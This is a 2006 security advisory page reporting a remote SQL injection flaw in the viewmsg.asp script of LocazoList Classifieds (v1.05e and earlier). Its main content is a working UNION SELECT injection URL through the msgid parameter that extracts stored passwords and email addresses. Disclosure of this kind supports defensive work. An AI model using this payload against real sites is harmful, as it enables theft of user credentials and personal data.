Computer Security

Security Advisory: LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA20418] dotProject Cross-Site Scripting Vulnerability

  [SA20438] BlueShoes Framework Multiple File Inclusion Vulnerabilities

  [SA20441] OSADS Board Comments Script Insertion Vulnerability

  [Full-disclosure] Advisory 04/2006: DokuWiki PHP code execution vulnerability in spellchecker

From:ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:05.06.2006
Subject:LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability

# Title  :   LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability
# Author :   ajann

#Vulnerability;

$$$ http://[target]/[path]/viewmsg.asp?msgid= SQL TEXT

$$$ Example:

http://[target]/[path]/viewmsg.asp?msgid=-1%20union%20select%20epass,
0,0,0,email,0,0,0,0,0,0,0,0,0,0%20from%20thing+where+msgid=X

Msgid= TopicID
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server